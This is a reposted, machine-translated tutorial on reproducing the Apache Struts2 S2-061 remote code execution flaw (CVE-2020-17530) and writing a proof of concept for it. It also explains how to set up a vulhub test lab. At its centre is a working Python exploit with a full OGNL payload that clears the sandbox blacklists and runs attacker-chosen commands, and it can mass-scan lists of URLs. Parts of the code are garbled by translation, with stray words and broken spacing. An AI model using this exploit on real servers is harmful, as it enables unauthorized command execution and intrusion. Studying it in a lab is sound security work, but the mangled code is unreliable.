Shulou(Shulou.com)05/31 Report--

This article introduces how to reproduce structs2-061remote command execution vulnerabilities and write poc. The content is very detailed. Interested friends can use it for reference. I hope it will be helpful to you.

1. Introduction

Apache Struts2 framework is a Web framework for developing Java EE network applications. Apache Struts disclosed the S2-061 Struts remote code execution vulnerability (CVE-2020-17530) on December 8, 2020. There may be OGNL expression injection vulnerabilities in situations such as the use of some tag, resulting in remote code execution with great risk.

2. Loophole principle

By constructing malicious OGNL expressions, Structs2 attackers cause secondary parsing of OGNL expressions, resulting in the impact of remote code execution.

This vulnerability takes advantage of Structs2 parsing the secondary expression of the attribute values of some tag attributes (such as id). When `% {x}` is used in these tag attributes and the value of `x` is controllable by the user, the attacker constructs the OGNL expression in the payload,payload, and the OGNL can access the attributes of the object and execute system commands.

3. Affect the version:

Struts 2.0.0-struts 2.5.25

4. Poc writing 4.1 code writing

Using the python language, import four libraries, request library, sys library, re library, OptionParser library.

In fact, at the beginning of the code only def s2_file this function, batch scan a txt inside all the url.

But my cousin said that the human-computer interaction of my code was too poor, so I added two functions, def s2_url (to achieve a single url scan) and a parsing library (to set the options of usage).

'' author:Sweetmelontime:2020-12-14s2-061 poc'''#-*-coding:utf-8-*-import requests,sys,redef s2_file (filename, command= "id"): with open (filename,'r') Encoding = 'utf-8') as F1: for line in F1: payload= "% 25% 7b (% 27Powered_by_Unicode_Potats0%2cenjoy_it%27). (% 23UnicodeSec+%3d+%23application%5b%27org.apache.tomcat.InstanceManager%27%5d). (% 23potats0%3d%23UnicodeSec.newInstance (% 27org.apache.commons.collections.BeanMap%27)). (% 23stackvalue%3d%23attr%5b%27struts.valueStack%27%5d). (% 23potats0. SetBean (% 23stackvalue). (% 23context%3d%23potats0.get (% 27context%27)). (% 23potats0.setBean (% 23context)). (% 23sm%3d%23potats0.get (% 27memberAccess%27)). (% 23emptySet%3d%23UnicodeSec.newInstance (% 27java.util.HashSet%27)). (% 23potats0.setBean (% 23sm)). (% 23potats0.put (% 27excludedClasses%27%2c%23emptySet)). (% 23potats0.put (% 27excludedPackageNames%27%2c%23emptySet)). (% 23exec%3d%23UnicodeSec.newInstance (% 27freemarker.template.utility.Execute%27). (% 23cmd%3d%7b%27 "+ command+"% 27% 7d). (% 23res%3d%23exec.exec (% 23cmd))% 7d "url=line+" / index.action?id= "+ payload # print (url) r=requests.get (url). Text # print (r) z=re.findall (" an id=.* ") R) output=str (z) .replace ("an id=\", ") # print (output) if" uid "in output: print (line.strip () +" struct2-061vulnerability ") else: print (line.strip () +" struct2-061vulnerability does not exist ") def s2_url (url Command= "id"): payload= "% 25% 7b (% 27Powered_by_Unicode_Potats0%2cenjoy_it%27). (% 23UnicodeSec+%3d+%23application%5b%27org.apache.tomcat.InstanceManager%27%5d). (% 23potats0%3d%23UnicodeSec.newInstance (% 27org.apache.commons.collections.BeanMap%27)). (% 23stackvalue%3d%23attr%5b%27struts.valueStack%27%5d). (% 23potats0.setBean (% 23stackvalue)). (% 23context%3d%23potats0.get (%) 27context%27). (% 23potats0.setBean (% 23context)). (% 23sm%3d%23potats0.get (% 27memberAccess%27)). (% 23emptySet%3d%23UnicodeSec.newInstance (% 27java.util.HashSet%27)). (% 23potats0.setBean (% 23sm)). (% 23potats0.put (% 27excludedClasses%27%2c%23emptySet)). (% 23potats0.put (% 27excludedPackageNames%27%2c%23emptySet)). (% 23exec%3d%23UnicodeSec.newInstance (% 27freemarker.template.utility.Execute%27) ). (% 23cmd%3d%7b%27 "+ command+"% 27% 7d). (% 23res%3d%23exec.exec (% 23cmd))% 7d "url=url+" / index.action?id= "+ payload # print (url) r=requests.get (url). Text # print (r) z=re.findall (" an id=.* ") R) output=str (z) .replace ("an id=\", ") print (output) from optparse import OptionParserusage ="% prog-f filename\ nUsage2:% prog-u url-c command "parser=OptionParser (usage=usage) parser.add_option Help='Input URL') parser.add_option ('- options input Command') parser.add_option ('- Cobb, Zhejiang, Japan, South Korea, Japan, South Korea, South Korea, South Korea Args) = parser.parse_args () # print (type (options.url)) # print (options.url) if (options.filename and options.url==None): # print (options.filename) s2_file (options.filename) if (options.url and options.filename==None): # print (options.url) s2_url (options.url Options.command) if (options.filename and options.url): print ("Usage1:" + sys.argv [0] + "- f filename\ nUsage2:" + sys.argv [0] + "- u url-c command") if (options.filename==None and options.url==None): print (sys.argv [0] + "- h") 4.2pyload Analysis (Mr. Zheng's small class)

(1) the first pyload

Why the previous writing is so long, in order to bypass sandboxie (in fact, structs2-061is structs2-059bypass).

The known OGNL sandboxie is limited to:

Cannot new an object

Unable to call methods and properties of blacklisted classes and packages

Cannot use reflection

Unable to call static method

The unrestricted operations of OGNL sandboxie are:

The object property setter/getter (public) assigns / takes values, and static properties can be accessed.

Method calls of instantiated classes (objects in OgnlContext), static methods are not allowed to be called

You can see that currently we can only look for available objects in OgnlContext.

If you want to go deeper, you need to understand the entire struct2 project and OGNL syntax. However, if you do not understand it in depth, you will know that you can reset the blacklist through the OGNL syntax, and then get the command execution method of the accessed command execution class.

(2) second pyload

5. Vulnerability recurrence 5.1 vulnerability environment construction

(1) kali installs docker

# prepare before deployment, make sure your Kali Linux is completely up-to-date before you start. Add Docker PGP key: because the domestic speed support for docker official website is not friendly. I will use Tsinghua image instead of $curl-fsSL https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/gpg | sudo apt-key add-# configure Docker APT repository:$ echo 'deb https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/ buster stable' | sudo tee / etc/apt/sources.list.d/docker.list# update APTsudo apt-get update# install Docker# if you installed the old version of Docker Please uninstall them: $sudo apt-get remove docker docker-engine docker.io# install docker:$ sudo apt-get install docker-ce# to view docker status: $sudo systemctl status docker# start docker:$ sudo systemctl start docker# boot automatically start sudo systemctl enable docker# view installation version $sudo docker version

(2) download vulhub-master and put it in kali

Git clone https://github.com/vulhub/vulhub.git

(3) enter the directory / vulhub-master/struts2/s2-061,

Start the shooting range: docker-compose up-d

5.2 Verification vulnerabilities

(1) Open http://192.168.8.135:8080/ by browser

(2) manual verification of grasping bags

Grab the packet to see the signature information of this vulnerability / .action? id=

So put payload on it, and you can see that the return packet returns the result of our command execution request.

(3) poc script verification

On how to carry out structs2-061remote command execution vulnerability reproduction and poc writing to share here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.